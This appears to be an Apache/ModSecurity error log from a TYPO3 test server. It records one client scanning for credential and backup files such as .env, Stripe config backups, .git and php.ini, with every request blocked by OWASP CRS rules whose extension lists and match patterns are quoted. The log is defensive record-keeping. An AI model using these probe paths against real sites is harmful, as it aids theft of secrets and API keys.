[Thu Jan 08 21:16:55.815547 2026] [:error] [pid 1270043] [client 18.119.100.98:35246] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/stripe.old"] [unique_id "aWAQtwvEr1EpOYnVfM6rmwAAAAc"]
[Thu Jan 08 21:16:55.815708 2026] [:error] [pid 1270043] [client 18.119.100.98:35246] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/stripe.old"] [unique_id "aWAQtwvEr1EpOYnVfM6rmwAAAAc"]
[Thu Jan 08 21:16:56.525996 2026] [authz_core:error] [pid 1270037] [client 18.119.100.98:35444] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup
[Thu Jan 08 21:16:56.873035 2026] [authz_core:error] [pid 1270035] [client 18.119.100.98:35530] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.stripe.bak
[Thu Jan 08 21:16:57.221090 2026] [:error] [pid 1270038] [client 18.119.100.98:35620] [client 18.119.100.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config.stripe.old"] [unique_id "aWAQuRmwMJtANIcuNUXpFQAAAAM"]
[Thu Jan 08 21:16:57.221419 2026] [:error] [pid 1270038] [client 18.119.100.98:35620] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config.stripe.old"] [unique_id "aWAQuRmwMJtANIcuNUXpFQAAAAM"]
[Thu Jan 08 21:16:57.221586 2026] [:error] [pid 1270038] [client 18.119.100.98:35620] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config.stripe.old"] [unique_id "aWAQuRmwMJtANIcuNUXpFQAAAAM"]
[Thu Jan 08 21:17:01.584443 2026] [:error] [pid 1270041] [client 18.119.100.98:36760] [client 18.119.100.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/stripe.json.backup"] [unique_id "aWAQvc3GwEx_BV8-CrWUNwAAAAU"]
[Thu Jan 08 21:17:01.584776 2026] [:error] [pid 1270041] [client 18.119.100.98:36760] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stripe.json.backup"] [unique_id "aWAQvc3GwEx_BV8-CrWUNwAAAAU"]
[Thu Jan 08 21:17:01.584935 2026] [:error] [pid 1270041] [client 18.119.100.98:36760] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stripe.json.backup"] [unique_id "aWAQvc3GwEx_BV8-CrWUNwAAAAU"]
[Thu Jan 08 21:17:02.294883 2026] [:error] [pid 1283304] [client 18.119.100.98:36906] [client 18.119.100.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/tmp/stripe.config"] [unique_id "aWAQvmAwUIZgFNkik8yVLgAAAAg"]
[Thu Jan 08 21:17:02.295217 2026] [:error] [pid 1283304] [client 18.119.100.98:36906] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tmp/stripe.config"] [unique_id "aWAQvmAwUIZgFNkik8yVLgAAAAg"]
[Thu Jan 08 21:17:02.295379 2026] [:error] [pid 1283304] [client 18.119.100.98:36906] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tmp/stripe.config"] [unique_id "aWAQvmAwUIZgFNkik8yVLgAAAAg"]
[Thu Jan 08 21:17:19.731323 2026] [authz_core:error] [pid 1270035] [client 18.119.100.98:41592] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Thu Jan 08 21:17:20.437346 2026] [authz_core:error] [pid 1270039] [client 18.119.100.98:41802] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jan 08 21:17:20.784438 2026] [authz_core:error] [pid 1270041] [client 18.119.100.98:41904] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/vendor
[Thu Jan 08 21:17:21.133783 2026] [authz_core:error] [pid 1270042] [client 18.119.100.98:42014] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/lib
[Thu Jan 08 21:17:21.478090 2026] [authz_core:error] [pid 1283304] [client 18.119.100.98:42140] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Thu Jan 08 21:17:21.824638 2026] [authz_core:error] [pid 1280390] [client 18.119.100.98:42238] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/core
[Thu Jan 08 21:17:22.175192 2026] [authz_core:error] [pid 1270038] [client 18.119.100.98:42352] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/admin
[Thu Jan 08 21:17:22.524494 2026] [authz_core:error] [pid 1270039] [client 18.119.100.98:42448] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Thu Jan 08 21:17:22.868502 2026] [authz_core:error] [pid 1270041] [client 18.119.100.98:42548] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Thu Jan 08 21:17:23.212287 2026] [authz_core:error] [pid 1270042] [client 18.119.100.98:42646] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/public
[Thu Jan 08 21:17:23.561069 2026] [authz_core:error] [pid 1283304] [client 18.119.100.98:42732] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/assets
[Thu Jan 08 21:17:23.909158 2026] [authz_core:error] [pid 1270036] [client 18.119.100.98:42822] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/uploads
[Thu Jan 08 21:17:24.260670 2026] [authz_core:error] [pid 1270037] [client 18.119.100.98:42914] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/laravel
[Thu Jan 08 21:17:24.611896 2026] [authz_core:error] [pid 1280390] [client 18.119.100.98:43010] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wordpress
[Thu Jan 08 21:17:24.961718 2026] [authz_core:error] [pid 1270038] [client 18.119.100.98:43106] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Thu Jan 08 21:17:25.309859 2026] [authz_core:error] [pid 1270039] [client 18.119.100.98:43180] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/old
[Thu Jan 08 21:17:25.654091 2026] [authz_core:error] [pid 1270041] [client 18.119.100.98:43274] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup
[Thu Jan 08 21:17:26.002103 2026] [authz_core:error] [pid 1270042] [client 18.119.100.98:43366] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test
[Thu Jan 08 21:17:26.352837 2026] [authz_core:error] [pid 1283304] [client 18.119.100.98:43446] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dev
[Thu Jan 08 21:17:26.700116 2026] [authz_core:error] [pid 1270036] [client 18.119.100.98:43548] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/staging
[Thu Jan 08 21:17:27.043919 2026] [authz_core:error] [pid 1270037] [client 18.119.100.98:43668] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/production
[Thu Jan 08 21:17:27.473879 2026] [:error] [pid 1280390] [client 18.119.100.98:43816] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aWAQ19KTJIy7S9W5nL2LOgAAAAk"]
[Thu Jan 08 21:17:27.474089 2026] [:error] [pid 1280390] [client 18.119.100.98:43816] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aWAQ19KTJIy7S9W5nL2LOgAAAAk"]
[Thu Jan 08 21:17:27.474252 2026] [:error] [pid 1280390] [client 18.119.100.98:43816] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aWAQ19KTJIy7S9W5nL2LOgAAAAk"]
[Thu Jan 08 21:17:27.828117 2026] [:error] [pid 1270038] [client 18.119.100.98:43910] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aWAQ1xmwMJtANIcuNUXpHwAAAAM"]
[Thu Jan 08 21:17:27.828334 2026] [:error] [pid 1270038] [client 18.119.100.98:43910] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aWAQ1xmwMJtANIcuNUXpHwAAAAM"]
[Thu Jan 08 21:17:27.828538 2026] [:error] [pid 1270038] [client 18.119.100.98:43910] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aWAQ1xmwMJtANIcuNUXpHwAAAAM"]
[Thu Jan 08 21:17:28.172995 2026] [:error] [pid 1270039] [client 18.119.100.98:44002] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWAQ2JccQYhM1DUhi_W7BAAAAAQ"]
[Thu Jan 08 21:17:28.173215 2026] [:error] [pid 1270039] [client 18.119.100.98:44002] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWAQ2JccQYhM1DUhi_W7BAAAAAQ"]
[Thu Jan 08 21:17:28.175154 2026] [:error] [pid 1270039] [client 18.119.100.98:44002] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aWAQ2JccQYhM1DUhi_W7BAAAAAQ"]
[Thu Jan 08 21:17:28.519534 2026] [:error] [pid 1270041] [client 18.119.100.98:44108] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWAQ2M3GwEx_BV8-CrWUQAAAAAU"]
[Thu Jan 08 21:17:28.519753 2026] [:error] [pid 1270041] [client 18.119.100.98:44108] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWAQ2M3GwEx_BV8-CrWUQAAAAAU"]
[Thu Jan 08 21:17:28.519932 2026] [:error] [pid 1270041] [client 18.119.100.98:44108] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aWAQ2M3GwEx_BV8-CrWUQAAAAAU"]
[Thu Jan 08 21:17:28.866146 2026] [:error] [pid 1270042] [client 18.119.100.98:44214] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWAQ2C7RlX2cRjHcFz6xvAAAAAY"]
[Thu Jan 08 21:17:28.866409 2026] [:error] [pid 1270042] [client 18.119.100.98:44214] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWAQ2C7RlX2cRjHcFz6xvAAAAAY"]
[Thu Jan 08 21:17:28.866572 2026] [:error] [pid 1270042] [client 18.119.100.98:44214] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aWAQ2C7RlX2cRjHcFz6xvAAAAAY"]
[Thu Jan 08 21:17:29.211600 2026] [:error] [pid 1283304] [client 18.119.100.98:44316] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWAQ2WAwUIZgFNkik8yVNwAAAAg"]
[Thu Jan 08 21:17:29.211806 2026] [:error] [pid 1283304] [client 18.119.100.98:44316] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWAQ2WAwUIZgFNkik8yVNwAAAAg"]
[Thu Jan 08 21:17:29.211963 2026] [:error] [pid 1283304] [client 18.119.100.98:44316] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWAQ2WAwUIZgFNkik8yVNwAAAAg"]
[Thu Jan 08 21:17:29.552626 2026] [:error] [pid 1270036] [client 18.119.100.98:44402] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWAQ2eM1154Q6b0hewij4AAAAAE"]
[Thu Jan 08 21:17:29.552863 2026] [:error] [pid 1270036] [client 18.119.100.98:44402] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWAQ2eM1154Q6b0hewij4AAAAAE"]
[Thu Jan 08 21:17:29.553060 2026] [:error] [pid 1270036] [client 18.119.100.98:44402] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWAQ2eM1154Q6b0hewij4AAAAAE"]
[Thu Jan 08 21:17:29.895790 2026] [:error] [pid 1270037] [client 18.119.100.98:44504] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWAQ2eA_IfWyU2EIiRhOgAAAAAI"]
